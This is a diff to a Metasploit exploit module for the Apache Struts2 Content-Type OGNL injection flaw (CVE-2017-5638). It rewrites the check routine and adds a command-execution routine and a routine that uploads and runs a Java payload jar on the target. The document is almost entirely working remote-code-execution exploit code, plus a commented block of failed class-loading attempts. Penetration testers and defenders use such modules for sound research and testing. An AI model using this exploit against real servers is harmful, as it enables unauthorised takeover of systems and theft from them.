ARCH_CMD works

Author: egypt

modules/exploits/multi/http/struts2_content_type_ognl.rb

@@ -18,52 +18,77 @@ def initialize(info = {})
         version 2.3.5 - 2.3.31,  and 2.5 - 2.5.10. Remote Code Execution can be performed
         via http Content-Type header.
       },
-      'Author'         => [ 'Nixawk' ],
+      'Author'         => [
+        'Nike.Zheng', # PoC
+        'Nixawk',     # Metasploit module
+        'Chorder',    # Metasploit module
+        'egypt',      # combining the above
+      ],
       'References'     => [
         ['CVE', '2017-5638'],
         ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045']
       ],
-      'Platform'       => %w{ unix win },
       'Privileged'     => true,
-      'Targets'        =>
+      'Targets'        => [
         [
-          ['Apache Struts2 / unix', {} ],
-          ['Apache Struts2 / win', {} ]
+          'Universal', {
+            'Platform'   => %w{ unix windows linux },
+            'Arch'       => [ ARCH_CMD, ARCH_JAVA ],
+          },
         ],
+      ],
       'DisclosureDate' => 'Mar 07 2017',
-      'DefaultTarget' => 0))
+      'DefaultTarget'  => 0))
 
       register_options(
         [
           Opt::RPORT(8080),
           OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]),
-          OptString.new('CMD', [true, 'The command to be executed in remote server', 'dir'])
+        ]
+      )
+      register_advanced_options(
+        [
+          OptString.new('HTTP::Method', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ])
         ]
       )
   end
 
-  def print_status(msg='')
-    super("#{peer} - #{msg}")
-  end
+  def check
+    var_a = rand_text_alpha_lower(4)
 
-  def send_http_request(content_type)
-    uri = normalize_uri(datastore["TARGETURI"])
-    resp = send_request_cgi(
-      'uri'     => uri,
-      'version' => '1.1',
-      'method'  => 'GET',
-      'headers' => {
-        'Content-Type': content_type
-      }
-    )
+    ognl = ""
+    ognl << %q|(#[email protected]@getProperty('os.name')).|
+    ognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))|
 
-    if resp && resp.code == 404
-      fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
+    begin
+      resp = send_http_request(ognl)
+    rescue Msf::Exploit::Failed
+      return Exploit::CheckCode::Unknown
     end
-    resp
+
+    if resp && resp.code == 200 && resp.headers[var_a]
+      print_good("Victim operating system: #{resp.headers[var_a]}")
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    case payload.arch.first
+    when ARCH_JAVA
+      datastore['LHOST'] = nil
+      resp = send_payload(payload.encoded_jar)
+    when ARCH_CMD
+      resp = execute_command(payload.encoded)
+    end
+
+    #require'pp'
+    #pp resp.headers if resp
   end
 
-  def http_send_command(cmd)
+  def send_http_request(ognl, method: 'LOLWUT', stuff: '')
+    uri = normalize_uri(datastore["TARGETURI"])
     content_type = "%{(#_='multipart/form-data')."
     content_type << "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
     content_type << "(#_memberAccess?"
@@ -73,56 +98,116 @@ def http_send_command(cmd)
     content_type << "(#ognlUtil.getExcludedPackageNames().clear())."
     content_type << "(#ognlUtil.getExcludedClasses().clear())."
     content_type << "(#context.setMemberAccess(#dm))))."
-    content_type << "(#cmd='#{cmd}')."
-    content_type << "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
-    content_type << "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
-    content_type << "(#p=new java.lang.ProcessBuilder(#cmds))."
-    content_type << "(#p.redirectErrorStream(true))."
-    content_type << "(#process=#p.start())."
-    content_type << "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
-    content_type << "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
-    content_type << "(#ros.flush())}"
-    send_http_request(content_type)
-  end
+    content_type << ognl
+    content_type << "}"
 
-  def check
-    var_a = rand_text_alpha_lower(4)
+    headers = { 'Content-Type' => content_type }
+    if stuff
+      headers['stuff'] = stuff
+    end
 
-    content_type = ""
-    content_type << %q|%{|
-    content_type << %q|(#_='multipart/form-data').|
-    content_type << %q|(#[email protected]@DEFAULT_MEMBER_ACCESS).|
-    content_type << %q|(#_memberAccess?|
-    content_type << %q|(#_memberAccess=#dm):|
-    content_type << %q|((#container=#context['com.opensymphony.xwork2.ActionContext.container']).|
-    content_type << %q|(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).|
-    content_type << %q|(#ognlUtil.getExcludedPackageNames().clear()).|
-    content_type << %q|(#ognlUtil.getExcludedClasses().clear()).|
-    content_type << %q|(#context.setMemberAccess(#dm)))).|
-    content_type << %q|(#[email protected]@getProperty('os.name')).|
-    content_type << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))|
-    content_type << %q|}|
+    #puts content_type.gsub(").", ").\n")
+    #puts
+    #puts content_type.length
+    #puts
 
-    begin
-      resp = send_http_request(content_type)
-    rescue Msf::Exploit::Failed
-      return Exploit::CheckCode::Unknown
-    end
+    resp = send_request_cgi(
+      'uri'     => uri,
+      'method'  => method,
+      'headers' => headers
+    )
 
-    if resp && resp.code == 200 && resp.headers[var_a]
-      print_good("Victim operating system: #{resp.headers[var_a]}")
-      Exploit::CheckCode::Vulnerable
-    else
-      Exploit::CheckCode::Safe
+    if resp && resp.code == 404
+      fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
     end
+    resp
   end
 
-  def exploit
-    unless check == Exploit::CheckCode::Vulnerable
-      fail_with(Failure::NotVulnerable, "Exploit not available on this system.")
-    end
+  def execute_command(cmd)
+    ognl = ''
+    ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).|
+    ognl << %q|(#[email protected]@getRequest().getHeader('stuff')).|
+    ognl << %q|(#r.addHeader('decoded',#cmd)).|
+    ognl << %q|(#[email protected]@getProperty('os.name')).|
+    ognl << %q|(#cmds=(#os.toLowerCase().contains('win')?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).|
+    ognl << %q|(#p=new java.lang.ProcessBuilder(#cmds)).|
+    ognl << "(#p.redirectErrorStream(true))."
+    ognl << "(#process=#p.start())."
 
-    resp = http_send_command(datastore['cmd'])
-    print_status("Command output: #{resp.body}")
+    ognl << %q|(#r.addHeader('end','end'))|
+
+    send_http_request(ognl, stuff: cmd)
   end
+
+  def send_payload(jar)
+    ognl = ""
+    ognl << %q|(#[email protected]@getRequest().getHeader('stuff')).|
+    ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#stuff)).|
+    ognl << %q|(#[email protected]@createTempFile('metasploit','.jar')).|
+    ognl << %q|(#f.deleteOnExit()).|
+    ognl << %q|(#fos=new java.io.FileOutputStream(#f)).|
+    ognl << %q|(#fos.write(#d)).|
+    ognl << %q|(#r='com.opensymphony.xwork2.dispatcher.HttpServletResponse').|
+
+    ognl << %q|(#context[#r].addHeader('stuff',#d[0])).|
+    ognl << %q|(#p=new java.lang.ProcessBuilder({'/usr/bin/java','-jar',#f.getAbsolutePath()})).|
+    ognl << %q|(#context[#r].addHeader('stuff',#f.getAbsolutePath())).|
+    ognl << %q|(#p.start()).|
+
+    ognl << %q|(#context[#r].addHeader('end','end'))|
+    send_http_request(ognl, stuff: [jar.pack].pack("m").delete("\n"))
+  end
+
 end
+
+=begin
+Doesn't work:
+
+    ognl << %q|(#cl=new java.net.URLClassLoader(new java.net.URL[]{#f.toURI().toURL()})).|
+    ognl << %q|(#c=#cl.loadClass('metasploit.Payload')).|
+    ognl << %q|(#[email protected]@getMethods(#c,'run',true).get(0)).|
+    ognl << %q|(#context[#r].addHeader('meth',#m.toGenericString())).|
+    ognl << %q|(#m.invoke(null,null)).|
+
+    #ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{null})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{})).|      # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).|      # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).|  # java.lang.IllegalArgumentException: java.lang.ClassCastException@4fee2899
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[])).|        # parse failed
+    #ognl << %q|(#m=#c.getMethod('run',null)).|                          # java.lang.IllegalArgumentException: java.lang.ClassCastException@50af0cd6
+
+    #ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@2231d3a9
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{null})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{})).|     # java.lang.IllegalArgumentException: java.lang.ClassCastException@5f78809f
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).|      # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@56c6add5
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[])).|       # parse failed
+    #ognl << %q|(#m=#c.getMethod('main',null)).|                         # java.lang.IllegalArgumentException: java.lang.ClassCastException@1722884
+
+=end